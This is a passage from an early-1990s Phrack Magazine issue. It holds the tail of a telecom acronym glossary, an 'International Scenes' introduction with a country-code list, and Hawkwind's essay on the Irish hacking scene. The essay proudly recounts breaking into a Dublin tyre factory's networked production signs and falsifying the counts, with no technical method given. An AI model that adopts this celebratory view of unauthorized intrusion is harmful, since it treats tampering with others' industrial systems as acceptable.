SIM System integrity monitor SIN Status indication normal alignment SIO Service information octet (SS7) SIP Serial interface port SIPB Siemens ISDN pc user board SIPB 5XXX SIPB modules SIPB 7XXX SIPB configurations SIPMOS Siemens PMOS SIPO 6XXX Siemens ISDN pc software object code SIPS 6XXX Siemens ISDN pc software source code SIR Sorting inquiry by range SIS Special identifying telephone number supplement SIT Special identifying telephone number SIT Special information tones SITAC Siemens isolated thyristor AC SITE Site assignments SITEST Siemens ISDN protocol software test tools SIU Subscriber line interface unit SJ Limited switched access line-service code for LATA access SK Skip SK Skip option SL Secretarial line INTER/TRA blocal 1-26 SL Subscriber line SLA Subscriber line address SLB Subscriber line busy SLC Signaling link code (SS7) SLC Subscriber loop carrier SLC Subscriber line counts for custom calling features SLC Subscriber loop carrier SLD Subscriber line data (bus) SLE Screen list editing SLE Screening line editor SLEN SLC line equipment number SLIC Subscriber line interface circuit SLIM Subscriber line interface module SLIM Subscriber loop interface module SLK Signaling link SLM Subscriber line module SLMA SLM analog SLMD SLM digital SLPK SLC-96 pack SLRF Systemiletterntenance results feature (eadas) SLS Signaling link selection (SS7) SLSN Unk COSMOS SLU Special studies SM Same SM Sampling INTER/TRA blocal 1-26 SM Service module SM Speech memory SM Switch module SM Switching module SM Switching module SM Synchronous multiplexor SMAC Service and maintenance administration center SMAS Switched maintenance access system SMAS Switched maintenance access system (provides access to the RMS-M and RTS) SMASF SMAS frame SMASPU SMAS power unit SMD Surface mounted device SMDF Subscriber main distributing frame SMDI Subscriber message desk interface SMDR Station message detail record SMDR Station message detail recording SMDR Station message detailed recording SMDS 
Switched multi-megabit data service SMF Sub multi frame SMG Supermastergroup SMM SARTS maintence manager (VAX 1/780) SMP SARTS maintance position (TP 52a) SMPU Switch Module Processor Unit SMS Service management system SMS Station management systems SMS Switching Module System SMSA Standard metropolitan statistical area SMTP Simple mail transfer protocol SMU Subscriber module urban SMU System master unit SN Sequence number SN Special access termination INTER/TRA blocal 1-26 SNA System network architecture (IBM) SNA Systems network architecture SNADS System network architecture distribution service SNET Southern new england telephone SNF Serial number format SNL Signaling link (CCS7) SNLS Signaling link set (CCS7) SNRS Signaling network route set (CCS7) SNS Service network system SO Service order SO Shift out SOAC Service order analysis and control SOB Service observing assignments SOB Service observing tag SOC Service order cancel SOC Service oversight center SOCC Standard optical cable code SOCC Switching operation control center SODC Service order delayed completion SOE Service order establishment SOE Standrard operating environment SOF Service order fix SOH Service order history SOH Service order withheld SOH Start of header SOI Service order assignment inquiry SOI Service order image SOL Service order listing SOM Modify a pending service order SONAR Service order negotiation and retrieval SONDS Small office network data system SONET Synchronous optical network SORD Service order dispach SOW Service order withdrawal SP Signal p SP Signal point (switching office in SS7) SP Signal processing SP Signal processor SP Signaling point SP Stimulus protocol SPA Special access SPACE Service provisioning and creation environment SPAN Space physics analysis network SPAN System performance analyzer SPARED Line involved in ISLU sparing configuration. 
SPC Signaling poiny code (SS7) SPC Southern pacific communications SPC Stored program control SPC Stored program controlled SPCR Serial port control register SPCS Stored program control system SPCS Stored programacontrolnsystem SPCS COER Stored-program control system/central office equipment report SPCSS Stored program control switching system SPD Speed SPDA Supplier data program SPFC Special purpose function code SPH Session protocol handler SPI Serial peripheral interface SPINT Signal processor interrupt SPL Split SPM Split and monitor SPM Split and monitor (SARTS command) SPOC Single point of contact SPS Split and supervise SPS Split and supervise (SARTS command) SPUC/DL Serial peripheral unit controller/data link SQ Equipment only-customer premises INTER/TRA blocal 1-26 SQA Simulated facility group (SFG) announcement (SAQ) SQD Signal quality detector SQL/DS Structured query language/data system SRA Selective routing arrangement SRAM Static ram SRCF Single line remote call forward SRDC Subrate data cross connect SRDM Subrate data multiplexer SRI Subscriber Remote Interface (RLCM) SRI Subscriber Remote Interface pack SRL Singing return loss SRV Service SRVT SCCP Routing Verification Test SS Dataphone select-a-station INTER/TRA blocal 1-26 SS Signaling system SS Special services SS7 Signaling system #7 (ccitt) SSA Special service automation SSAS Station signaling and announcement subsystem SSB Single-sideband SSB Switched services bureau SSBAM Single-sideband amplitude modulation SSC Specal service center SSC Special service center SSC Special services center SSC Standard speech circuit psb4500/-1 SSCP Subsystem services control point SSD No second start dial wink SSD No second start dial wink (MDII) SSDAC Specal services dispach administration centers SSF Sub service field SSI Serial signal interface SSN Subsystem number SSN Switched service network SSO Satellite switching office SSO Satellite switching office assignments SSP Send single pulses (C/I channel code 
for test mode) SSP Service switching point SSP Service switching points SSP Signal switching point SSP Sponsor selective pricing SSP Switching service points SSP System status panel SSPC Ssp controller SSPRU Ssp relay unit SSTR Selective service trunk reservation (SSTR). SSTR Service selective trunk reservation SSTTSS Space-space-time-time-space-space network SSWAP Switching services work allocation procedures (GTE) ST A signal that indicates the end of mf pulses (stop) ST Present status of telephone number ST Self test request nt (IOM2 monitor message) ST Start ST Subscriber terminal STA Station set STAB Station abbreviation file STARS Sampled traffic analysis and reports systems STATMUX Statistical multiplexer STB Standby STC Service test center STC Serving test center STC Switching technical center STCR Synchronous transfer control register STD Standard STD Subscriber trunk dialing STDM Statistical time division multiplexing STEP Services testing evolution platform STEP Sides static test of IOS and mf on board (in sitest) STKE Stack protect error STLWS Supplementary trunk and line work station STM Synchronous transfer mode STN Station definition STN Summarize telephone numbers STOR Memory storage STORY Screening tool for report files (IOS) STP Self test pass (IOM2 monitor message) STP Signal transfer point STP Signal transfer point (SS7) STP Stop STRAT Strategy STS Shared tenant service STS Space-time-space network STS Space-time-space switch (TMS-TSI-TMS) STS Station signaling STS Station signaling test (SARTS command) STS Steered tenant service STS Synchronous transport signal STS 2060 Sicofi software STT Telephone number status STTP Supplemental trunk test panel STTP Supplementary trunk test panel - trunk testing position (1ess) STU 2000 Stand alone ISDN user board STU 2040 Stand alone MTS user board STU 2050 Stand alone PBC user board STU 2060 Stand alone SICOF user board STUDIALO PC software for STU 2xxx STX Start of test STX Start of text SU Signaling unit SU
Syndes units (synchronizers-desynchronizers) SU5IN Subunit 5 interrupt SU6IN Subunit 6 interrupt SU7IN Subunit 7 interrupt SUB Sub switch SUB Sub-addressing (i.251) SUB Substitute character (teletex) SUBL Sublet service SUERM Su error rate monitor SUFX Suffix SUM1 Summary screen SUP Supervision SUS Suspend (SS7: in ISUP) SUSP Suspend (i.451) SV Slave SV Switched voice SVB Serving bureau SVC Critical service circuits SVC Switched virtual circuit SVC Switched virtual circuits SVL Service observing loops SVP Surge voltage protector various SVS Select vertical spacing (teletex) SVS Switched voice service SW Switch name SW Switched SWB Southwestern bell SWC Same wire center SWC Set work code SWEQF Switch equipment failure. SWFC Sliding-window flow control SWFN Switch function file SWG Sub working group SWS Switch work station SWS Switched signaling SWS Switching signal test (SARTS command) SWST Switch signature table SX Simplex (mode is a PT TR connected together) SX Simplex signaling SXS Step by (X) step SYC System control SYN Synchronous idle SYNDES Synchronizer/desynchronizer SYP Synchronisation pulse SYS Machine number SYS System SYS System manager SYSGEN System generation SZD Seized SxS Step-by-step or strowger switch T Double wire pair T Initials of person receiving report.
T Termination T Tip T&A Toll and assistance T&L Termination T&M Talk-and-monitor T&R Tip and ring T&R Two wire phone connection T- Transportfunction- T-BERD T-carrier Bit Error Rate Tester T-GRND Tip-ground T1/OS T1 carrier outstate T1FE T1 carrier front end TA Tandem tie-trunk INTER/TRA blocal 1-26 TA Terminal adaption TA Terminal adaptor TA Transfer allowed TA Transfer assembly TAB Telephone ability battery TAC Technical assistance center TAC Tei assignment control (IOS) TAC Terminal access circuit TAC Test and access circuit TACD Telephone area code directory TAD Test access digroup TAG Translation administration group TAI Tie pair assignment inquiry TAN Technation access network TAN Test access network TAP Telephone assistance plan TAP Teletex access protocol (x.430: p5) TAP Test access path TAP Touchtone assignment priority number TARE Tariff table (AMA NTI) TAS Telephone answering service TASC Technical assistance service center TASC Telecommunications alarm and surveillance control TASC Telecommunications alarm surveillance and control system TASI Time assignment speech interpolation TASI Time assignment speech interpolation system TAT Test access trunk TAT Test alignment of frame terminal TAT Transatlantic telephone TATS Trouble analysis of transmission and signaling TAU Time assignment unit TBL Trouble TC Control/remote metering-telegraph grade INTER/TRA blocal 1-26 TC Timing counter TC To cable TC Toll center TC Transaction capabilities TC15 Reports overall traffic condition - 1AESS traffic condition TCA Telephone company administration TCAP Telecommunications alarm surveillance TCAP Transaction (ie sdngtcap) TCAP Transaction capabilities application part TCAP Transaction capabilities applications port TCAS T-carrier administration system TCAS T-carrier administrative system TCC Toll control center TCC Trunk class code TCG Test call generation TCIF Telecommunications industry forum TCM Time compression multiplexer
TCM Trellis coded modulation TCP Transport control protocol (DOD) TCR Transient call record TCS Terminating code screening TCSP Tandem cross section program TCU Timing control unit TD Test direction TD Tone decoders TDAS Traffic data administration system TDAS Translation data assembler system TDC Tape data controller TDC Telex destination code (ISO 7498) TDC Terrestrial data circuit TDD Telecommunications device for deaf TDF Trunk distributing frame TDM Time division multiplex TDMA Tdm access TDRS Traffic data recorder system TE Terminal equipment TE Transit exchange (contains PSF) TE Transverse electric TED Text editor TEHO Tail end hop off TEI Terminal endpoint identifier TELEX Teleprinter exchange TELNET Virtual terminal protocol TELSAM Telephone service attitude measurement TEN Trunk equipment number TER Terminal TERM Terminate TERM Terminating TEST In test mode. TET Display or change band filter file TF Telephoto/facsimile INTER/TRA blocal 1-26 TFC Transfer frame changes TFLAP T-carrier fault-locating application program TFS Trunk forecasting system TFTP Television facility test position TG Tip-to-ground TG Translation guide TGC Manual trunk group controls messages. TGC Terminal group controller TGID Trunk group id TGMEAS Basic trunk group measurements TGN Trunk group number TH Trouble history THGP Thousands groups THL Trans hybrid loss TI Test indication TIA Telephone information access TIC Telecom ic (IOM-bus) TICOM Treated interface common circuit. TIDE Traffic information distributor & editor TIG Dial transfer input generator TIM Timing TIMEREL Time release TINTF The T interface is down.
TIP The installation practices TIRKS Trunk integrated record keeping system TK Local PBX trunk INTER/TRA blocal 1-26 TK Trunk cable and pair number TKT Trouble ticket file TL Non-tandem tie trunk INTER/TRA blocal 1-26 TL Test line TL02 Reason test position test was denied - 1AESS traffic TLC Tail COSMOS TLC Translate lanavar/CPS TLI Telephone line identifier TLK Talk TLM Trouble locating manual TLN Trunk line network TLP Transmission level point TLPU Telecommunications line processor unit TLS Tail switch TLTP Trunk line and test panel TLTP Trunk line testrpanelng frame TLWS Trunk and line work station TM Testmode TM Transverse magnetic TM Transfer modus TM Trunk maintenance TM1 Terminal 1 (IOS) TMA Trunk module analog TMAS Transport maintenance and administration systems TMC Timeslot management channel TMD Trunk module digital TMDF Trunk main distributing frame TME Trunk module equipment TMMS Telephone message management system TMPS Trunk maintenance position TMR Transient memory record TMRS Traffic measurement (GTE) TMRS Traffic measurement and recording system TMRS Traffic metering remote system TMS Time multiplexed switch TMS Time-multiplexed switch TMS Time-multiplexed switching TMT Traffic management.
TMX Trunk module with x-interface TN Telephone number TN Tone (C/I channel code: wake up signal) TN Transaction number TN01 Trunk diagnostic found trouble - 1AESS trunk network TN02 Dial tone delay alarm failure - 1AESS trunk network TN04 Trunk diag request from test panel - 1AESS trunk network TN05 Trunk test procedural report or denials - 1AESS trunk network TN06 Trunk state change - 1AESS trunk network TN07 Response to a trunk type and status request - 1AESS trunk network TN08 Failed incoming or outgoing call - 1AESS trunk network TN09 Network relay failures - 1AESS trunk network TN10 Response to trk-list input usually a request from test position TN11 Hourly status of trunk undergoing tests - 1AESS trunk network TN16 Daily summary of precut trunk groups - 1AESS trunk network TNC Terminal node controller TNDS Total network data system TNF Telephone number format TNN Trunk network number TNOP Total network operation plan TNOP Total network operations plan TNPC Traffic network planning center TNS Telephone number swap TO Toll office TOC Television operating center TOC Transfer order completion TOC0 Reports status of less serious overload conditions - 1AESS traffic TOC0 Serious traffic condition - 1AESS traffic overload TOE Transfer order establishment TOF Mass oe transfer order frame listings TOI Dial transfer order inquiry TOL Transfer order lists TOO Transfer order omissions TOP Task-oriented practices TOP Technical office protocol TOPQ Top of queue (Quasi SDL) TOPS Timesharing operating system TOPS Traffic operator position system TOS Trunk orderf-service (list) TOSS/MP Traffic operator sequence simulator/mult purpose TOW Transfer order withdrawal TP Dacs test port or test position TP Test position TP Tie pair TP Toll point TP 52A SARTS test position 52A TPC TOPS (DMS) position controllers TPH Transport protocol handler TPMP Tnds performance measurement plan TPMP Total network data system performance measurement plan TPR Taper code TPU Tie pair usage report TQ 
Television grade customized-service code for LATA access TQ Trunk query TQA Trunk group queuing announcements TR Test register TR Toll regions TR Transfer register TR Trunk reservation controls messages. TR Turret or automatic call distributor (ACD) trunk INTER/TRA blocal TR01 Translation information - 1AESS TRAC Call tracing TRANS Transmit TRB Periodic trouble status reporting TRBL Unspecified trouble. TRBLORG Origination trouble. TRC Transfer order recent change report TRCC T-carrier restoration and control centers TRCO Trouble reporting control office TRE Transmission equipment TREAT Trouble report evaluation analysis tool TREAT Trouble report and analysis tool TREQF Transmission equipment failure. TRFC15 Fifteen minute traffic report TRG Trouble reference guide TRI Tone ringer psb652x TRI Transmission equipment assignment inquiry TRK Analog or digital recorded announcement trunks TRK Trunks TRKBD Trunk board. TRKCT Trunk circuit. TRM Two mile optically remote switching module TRM Two-mile remote switching module TRMG Terminal group TRMSN Transmission TRMTR Transmitter TRNS Translations TRR Tip-ring reversal TRR Tip-ring reversal (MDII) TRR Tip-ring reverse TRU Transmit/receive unit TRVR Translation verification TRW Total reservation order withdrawal TS Test number TS Time slot TSA Time slot assignment TSC Test system controller TSC Tristate control TSC/RTU Test systems controller/remote test unit TSCPF Time switch and call processor frame TSCPF Time switch and central processor frame TSG Timing signal generator TSI Time slot interchanger TSI Time slot interchangers TSI Time-slot interchange TSIIN Time-slot interchange interrupt TSIU Time slot interchange Unit TSL Line equipment summary report TSMS Traffic separation measurement system TSN Test session number TSN Traffic statistics on telephone numbers TSO Time sharing option TSORT Transmission system optimum relief tool TSP Test supervisor TSP Traffic service position TSPS Traffic service
position system TSS Trunk servicing system TSS Trunk servicing systems TSST Time-space-space-time network TST Test TST Time-space-time network TST Time-space-time switch (TSI-TMS-TSI) TST Transmission test TST Traveling-wave tube TSTS Time-space-time-space network TSV Test status verification (monitor) TSW Total service order withdrawal TT Teletypewriter channel INTER/TRA blocal 1-26 TT Trunk type TTA Terminating traffic area TTAA Transmission theory and applications TTC Terminating toll center TTE Trunk traffic engineering TTFCOM Test transmission facility common TTFCOM Transmission test facility common TTL Transistor-transistor logic TTMI Trunk transmission maintenance index TTP Trunk test panel TTR Operator trunk trouble reports TTR Operator trunk trouble reports (MDII) TTS Trunk time switch TTSI Transmit time slot interchanger TTTN Tandem tie trunk network TTU Translation Table Update (GTE) TTY Get tty name - COSMOS command TTY Teletypewriter TTYC Tty controller TU Transmit unit TU Trunk unit TU Turret or automatic call distributor (acd) line INTER/TRA blocal TUCHBD Trunk unit channel board TUP Telephone user part (SS7: q.72x) TUR Traffic usage recording TUR Trunk utilization report TUT Trunk under test TV TV channel one way 15khz audio-service code for LATA access TW TV channel one way 5khz audio-service code for LATA access TW Twist TW02 Dump of octal contents of memory - 1AESS translation TWX Teletype writer exchange TWX Teletypewriter exchange TX Dedicated facility INTER/TRA blocal 1-26 TX Tone transceivers TXC Text checker TXM Transfer centrex management TYP Switch type TYP Type Talkoff Take off Trunk Trunk TxSD Transmit serial data U Single wire pair U(k0) (ger) u0 echo cancellation interface U(p0) (ger) u0 burst mode interface U- Unnumbered (u-frames) U-DSL U-interface digital subscriber line UA Unnumbered ack (LAP-D response) UA User agent (x.400) UAE User application entity or user agent entity (x.400) UAF Unblocking acknowledgment failure UAI U
activation indication (C/I channel code) UBA Unblocking acknowledgement UBL Unblocking (SS7: in ISUP) UCA Unauthorized centralized automatic message accounting (MDII) UCD Uniform call distribution UCL Unconditional UCONF Universal conference UCS User control string UDC Universal digital channel UDLC Universal dlc UDP Update dip parameters UDP User datagram protocol UDR User data rate UDT Unidata (SS7: in SCCP) UDTS Unidata service (SS7: in SCCP) UDVM Universal data voice multiplexer UES Update the entity summary table UFD Microfarad UFO Unprinted frame orders UFT Unitized facility terminals UI Unnumbered information (LAP-D command) UIC U-interface unit UIC User identification code UID User id UINTF The ANSI standard U interface is down. UITP Universal information transport plan ULCU User level control/command unit UMC Unassigned multiplexer code UNDRN Underrange UNISTAR Universal single call telecommunications answering & repair UNKN Unknown UOA U interface only activation (in EOC) UP User part UPC Update ccs vs.
class of service table UPDT Update UPS Uninterruptible power systems UQL Unequipped label received (outgoing) US USOC US Unit separator USART Universal synchronous/asynchronous receiver/transmitter USB Upper side band USITA United states independent telephone association USL List USOC (us) file data USO Universal service order USOC Universal service order code USP Universal sampling plan USR User-to-user information (SS7: in ISUP) UTC Unable to comply ack (in eoc) UTC Unacknowledged (unnumbered) information transfer control (IOS) UTC Update table for concentrator redesign UTD Universal tone decoder UTG Universal tone generator UTM Universal transaction monitor UTS Umbilical time slot UUCICO Unix to unix copy incoming copy outgoing UUCP Unix to unix copy program UUCP Unix-system to unix-system copy UUID Universal user identification UUS User-to-user signaling (i.257 a) UUT User to user signaling UVC Universal voice channel UWAL Universal wats (wide area telephone service) access line UXS Unexpected stop UXS Unexpected stop (MDII) V Volts V(R) Receive sequence counter V(S) Transmit sequence counter VAC Vacuumschmelze (produces cores and transformers) VAL Minimum valid hours for entity data VAN Value added network VANS Value added network service VAP Value added process VAP Videotext access point VAR Value added retailer VC Virtual call VC Virtual circuit VCA Vacant code VCB Virtual circuit bearer VCS Virtual circuit switch (as in Datakit) VCS Virtual circuit switching VCS Virtual circuit system VDC Unk?
(On service order) VDT Video display terminal VERS Version VF Commercial television (full time) INTER/TRA blocal 1-26 VF Voice frequency VFAC Verified and forced account codes VFD Verify display VFG Virtual facility group VFN Vendor feature node VFS Verify status VFY Verify VG Voice grade VGB Voice grade budget VGF Voice grade facility VGT Voltage test VGT Voltage test (SARTS command) VH Commercial television (part time) INTER/TRA blocal 1-26 VHDL Very high scale ic description language (DOD) VHF Very high frequency VINES Virtual network software VIU Voiceband interface unit VL (Ger) connecting cable VLD Validity VLSI Very large-scale integrated circuitry VLT Voltage VM Control/remote metering-voice grade INTER/TRA blocal 1-26 VM/SP Virtual machine/system product VMC Vendor marketing center VMCF Virtual machine communications facility VMR Volt-meter reverse VMRS Voice message relay system VMS Virtual memory operating system VMS Voice mail system VMS Voice management system VMS Voltage Monitor error Summary VNF Virtual network feature VNL Via net loss plan VNLF Via net loss factor VO International overseas television INTER/TRA blocal 1-26 VODAS Voice over data access station VPA Voice path assurance timeout (outgoing) VPN Virtual private network VR Non-commercial television VRMS Voltage remote mean square VRS Voice response system VSAM Virtual storage access method VSAT Very small aperture terminal VSAT Very small aperture terminal (for satellite communication) VSB Vestigial sideband modulation VSC Vendor service center VSE Virtual storage extended VSP (ger) full frame storage VSR Voice storage and retrieval VSRTP Voice service remote test port VSS Voice storage system VSSP Voice switch signaling point VSt (ger) exchange unit VT Vertical tabulator VT Virtual terminal VTAM Virtual telecom access method VTAM Virtual telecommunications access method VTI Virtual terminal interface VTOC Volume table of contents VTS Video teleconferencing system VUA Virtual
user agent W Date and time this ticket is closed. W With WADS Wide area data service WAN Wide area network WATS Wide area telecommunications service WATS Wide area telephone service WB Wideband digital 19.2 kb/s-service code for LATA access WC Special 800 surface trunk INTER/TRA blocal 1-26 WC Wire center WCC Change wire center - COSMOS command WCI Write controller interface (IOM2 monitor command) WCPC Wire center planning center WCT Worksheet for cable throw orders WD Special wats trunk (out) INTER/TRA blocal 1-26 WDCS Wideband digital cross-connect system WDFHP Recursive high pass filter + decimation filter WDFLP Recursive low pass filter + decimation filter WDM Wavelength division multiplex WDM Wavelength division multiplexing WDT Watch dog timer WE Wideband digital 50 kb/s-service code for LATA access WEBS Wells electronic banking system WF Wideband digital 230.4 kb/s-service code for LATA access WFA Work and force administration WFA-CMSA Work and force administration - common module for systems administration WFA/DO Work and force administration/dispatch out WFL Working frame location WG Switch group WH Wideband digital 56 kb/s-service code for LATA access WI 800 surface trunk INTER/TRA blocal 1-26 WI Wink start WIP Workcenter information package WJ Wideband analog 60-108 khz-service code for LATA access WL Wideband analog 312-552 khz-service code for LATA access WM Work manager WN Wideband analog 10hz-20 khz-service code for LATA access WO Wats line (out) INTER/TRA blocal 1-26 WOI Work order inquiry WOL Work order listing WORD Work order and record detail WORD Work order record and details WP Wideband analog 29-44 khz-service code for LATA access WPN Work package number WPT Work package table WPT Work package type WR Wideband analog 564-3064 khz-service code for LATA access WS Wats trunk (out) INTER/TRA blocal 1-26 WSL Work status list WSO Wats service office WUL Work unit report for subscriber line WX 800 service line INTER/TRA blocal 1-26 WY Wats trunk 
(2-way) INTER/TRA blocal 1-26 WZ Wats line (2-way) INTER/TRA blocal 1-26 X Check t for trouble X-bar Crossbar XA Dedicated digital 2.4 kb/s-service code for LATA access XAD Transmit address XB Dedicated digital 4.8 kb/s-service code for LATA access XB X-bar XBT X-bar tandem XFE X-front end XFIFO Transmit fifo XG Dedicated digital 9.6 kb/s-service code for LATA access XH Dedicated digital 56. kb/s-service code for LATA access XID Exchange identification (LAP-D command/response) XMS Extended multiprocessor operating system XN X XN X number XOFF Transmission off (dc1) XON Transmission on (dc3) XPL Cross reference protocol listing (PCT) XST Expected stop time-out XTC Extended test controller XTC Extended test controllers Y Initials of person to whom ticket is dispatched Z Redispatch information. Z Transmit level point z ZA Alarm circuits INTER/TRA blocal 1-26 ZC Call and talk circuits INTER/TRA blocal 1-26 ZCS Zero code suppression ZCS Zero code suppression encoding (ds-1) ZE Emergency patching circuits INTER/TRA blocal 1-26 ZF Order circuits- facility INTER/TRA blocal 1-26 ZM Measurement and recording circuits INTER/TRA blocal 1-26 ZN Zone location ZP Test circuit- plant service center INTER/TRA blocal 1-26 ZQ Quality and management circuits INTER/TRA blocal 1-26 ZS Switching- control and transfer circuits INTER/TRA blocal 1-26 ZT Test circuits- central office INTER/TRA blocal 1-26 ZV Order circuits- service INTER/TRA blocal 1-26 kHz Kilohertz-one thousand hertz

----------------------EOF------EOF-------EOF------EOF----------------------

==Phrack Magazine== Volume Four, Issue Forty-Three, File 26 of 27

International Scenes

There was once a time when hackers were basically isolated. It was almost unheard of to run into hackers from countries other than the United States. Then in the mid 1980's thanks largely to the existence of chat systems accessible through X.25 networks like Altger, tchh and QSD, hackers world-wide began to run into each other.
They began to talk, trade information, and learn from each other. Separate and diverse subcultures began to merge into one collective scene and have brought us the hacking subculture we know today. A subculture that knows no borders, one whose denizens share the common goal of liberating information from its corporate shackles. With the incredible proliferation of the Internet around the globe, this group is growing by leaps and bounds. With this in mind, we want to help further unite the communities in various countries by shedding light onto the hacking scenes that exist there. We have been requesting files from people to describe the hacking scene in their country, but unfortunately, more people volunteered than followed through (you know who you are.) By next issue we will have more, I'm sure, but for now, we want to introduce you all to the scenes in Ireland and Canada.

*****************************************************************************

COUNTRIES ON THE INTERNET

AD Andorra AE United Arab Emirates AF Afghanistan AG Antigua and Barbuda AI Anguilla AL Albania AM Armenia AN Netherlands Antilles AO Angola AQ Antarctica AR Argentina AS American Samoa AT Austria AU Australia AW Aruba AZ Azerbaidjan BA Bosnia-Herzegovina BB Barbados BD Bangladesh BE Belgium BF Burkina Faso BG Bulgaria BH Bahrain BI Burundi BJ Benin BM Bermuda BN Brunei Darussalam BO Bolivia BR Brazil BS Bahamas BT Bhutan BV Bouvet Island BW Botswana BY Bielorussia BZ Belize CA Canada CC Cocos Island CF Central African Republic CG Congo CH Switzerland CI Ivory Coast CK Cook Islands CL Chile CM Cameroon CN China CO Colombia CR Costa Rica CS Czechoslovakia CU Cuba CV Cape Verde CX Christmas Island CY Cyprus DE Germany DJ Djibouti DK Denmark DM Dominica DO Dominican Republic DZ Algeria EC Ecuador EE Estonia EG Egypt EH Western Sahara ES Spain ET Ethiopia FI Finland FJ Fiji FK Falkland Islands FM Micronesia FO Faroe Islands FR France FX France GA Gabon GB Great Britain (UK) GD Grenada GE Georgia GH
Ghana GI Gibraltar GL Greenland GP Guadeloupe GQ Equatorial Guinea GF French Guyana GM Gambia GN Guinea GR Greece GT Guatemala GU Guam GW Guinea Bissau GY Guyana HK Hong Kong HM Heard & McDonald Island HN Honduras HR Croatia HT Haiti HU Hungary ID Indonesia IE Ireland IL Israel IN India IO British Indian Ocean Territories IQ Iraq IR Iran IS Iceland IT Italy JM Jamaica JO Jordan JP Japan KE Kenya KG Kirgistan KH Cambodia KI Kiribati KM Comoros KN St.Kitts Nevis Anguilla KP North Korea KR South Korea KW Kuwait KY Cayman Islands KZ Kazachstan LA Laos LB Lebanon LC Saint Lucia LI Liechtenstein LK Sri Lanka LR Liberia LS Lesotho LT Lithuania LU Luxembourg LV Latvia LY Libya MA Morocco MC Monaco MD Moldavia MG Madagascar MH Marshall Islands ML Mali MM Myanmar MN Mongolia MO Macau MP Northern Mariana Island MQ Martinique MR Mauritania MS Montserrat MT Malta MU Mauritius MV Maldives MW Malawi MX Mexico MY Malaysia MZ Mozambique NA Namibia NC New Caledonia NE Niger NF Norfolk Island NG Nigeria NI Nicaragua NL Netherlands NO Norway NP Nepal NR Nauru NT Neutral Zone NU Niue NZ New Zealand OM Oman PA Panama PE Peru PF Polynesia PG Papua New Guinea PH Philippines PK Pakistan PL Poland PM St. Pierre & Miquelon PN Pitcairn PT Portugal PR Puerto Rico PW Palau PY Paraguay QA Qatar RE Reunion RO Romania RU Russian Federation RW Rwanda SA Saudi Arabia SB Solomon Islands SC Seychelles SD Sudan SE Sweden SG Singapore SH St. Helena SI Slovenia SJ Svalbard & Jan Mayen Islands SL Sierra Leone SM San Marino SN Senegal SO Somalia SR Suriname ST St. 
Tome and Principe SU Soviet Union SV El Salvador SY Syria SZ Swaziland TC Turks & Caicos Islands TD Chad TF French Southern Territories TG Togo TH Thailand TJ Tadjikistan TK Tokelau TM Turkmenistan TN Tunisia TO Tonga TP East Timor TR Turkey TT Trinidad & Tobago TV Tuvalu TW Taiwan TZ Tanzania UA Ukraine UG Uganda UK United Kingdom UM US Minor Outlying Islands US United States UY Uruguay UZ Uzbekistan VA Vatican City State VC St.Vincent & Grenadines VE Venezuela VG British Virgin Islands VI U.S. Virgin Islands VN Vietnam VU Vanuatu WF Wallis & Futuna Islands WS Samoa YE Yemen YU Yugoslavia ZA South Africa ZM Zambia ZR Zaire ZW Zimbabwe

****************************************************************************

HACKING IN IRELAND BY HAWKWIND

Greetings from the Emerald Isle! My name is Hawkwind, and I'm an Irish hacker *evil cackle*. So, what's the hacking scene like in this small green island called Ireland, perched on the edge of the Atlantic Ocean? -an island which claims to have one of the most sophisticated digital phone networks in Europe, home of Eirpac (the Irish equivalent to Sprintnet/Telenet) and lots of other weird and wonderful things like that. Well, the hacking scene, like the country itself, is small -there are no elite in Ireland. -or if there are they are so elite that nobody has heard of them. So if you're only into elite stuff, then don't bother reading on, skip onto the next country. Also, sadly at the moment, there seems to be little interest in hacking in Ireland -I can count the number of Irish hackers I know on the fingers of one hand. Maybe I'm just hanging out in the wrong places, or perhaps it's the Iron Hand of Ireland's own Little Brother, friend and follower of the U.S's Big Brother, enforcing his evil ways of censorship and the like upon us all, denying us the right to free information. Nationwide censorship of Usenet hurts like dry ice, but restricting ftp and telnet out of the country to the privileged few, is the fatal crunch.
Now, I ask you, with grief like this, is it any wonder so few Irish have made it into the Computer Underground -to those that have beaten the odds, I wish them well. OK, so what do Irish hackers like to hack? Like many hackers we just have the curiosity and desire to explore any system or network we come across -the everlasting search for that spine-tingling adrenaline rush when you've beaten the system and got somewhere where perhaps no commoner has gone before -don't ever ask us to choose between getting well drunk, having sex, or hacking --it would be a rough choice. Let me start by telling you of what I find an interesting moment in Irish hacking history. -to you it may just seem like no big deal, but we kinda like it. There is a tyre manufacturing company in Dublin, Ireland and they like to make tyres--in order not to ruin any reputations we won't mention any names--just another tyre company. Now this company likes nice modern systems--big colorful display panels with lots of flashing lights, to keep their managers happy and amused for hours. A happy company is lots of happy striving workers and so, a big flashy sign which displayed the number of tyres being produced, and dutifully counted upwards every time one came off the assembly line, was constructed. So they had a big sign inside the plant so the workers could see how hard they were working, and big bonuses and lots of presents were promised if they got past a certain number in a day. There was also a large juicy sign outside the plant showing this number so that the general public could be suitably impressed with the busy-bee workers and the number of tyres being produced.
And all these signs and computers controlling them were connected to such mysteries as a network with a couple of black boxes which management proudly called modems -enter stage left, Irish hackers, *deep bow and evil wave* So you can imagine, one warm sunny summer's evening, when there was really nothing better to do in Dublin, strange things started to happen at the tyre factory. Yes, strange things indeed. Suddenly the workers got very lazy and started slowing down their production, becoming slower and slower and slower. The numbers stopped counting up on the glowing sign. Then the digits oddly started counting backwards. Down they went, getting faster and faster -people began to picture enraged workers destroying tyres in a crazed frenzy. Soon our sign showed that there were no tyres left and it began to dive into negative numbers of tyres. The passers-by scratched their heads in astonishment. Ah, but enough fun -this really was a very good tyre company with very hard-working workers. They deserve lots of bonuses -heck, didn't someone say this was the most productive factory in Europe? Well it was that day anyway! *evil cackle* So the signs stopped counting backwards, and suddenly began to race forwards like there was no tomorrow. The workers were scurrying back and forth at lightning speed -one hundred, two hundred..a thousand...ten thousand...what, a hundred thousand! Soon our good workers had produced more tyres in the space of 20 minutes, than visitors Disneyland had in 25 years... Ah yes, these are the things that Irish hackers like to do -we still wonder if the management gave all those good workers their bonuses?? So really, we like to investigate or hack anything that we might stumble across -anything from the local University library computer to tyre companies to networks in lands far away.
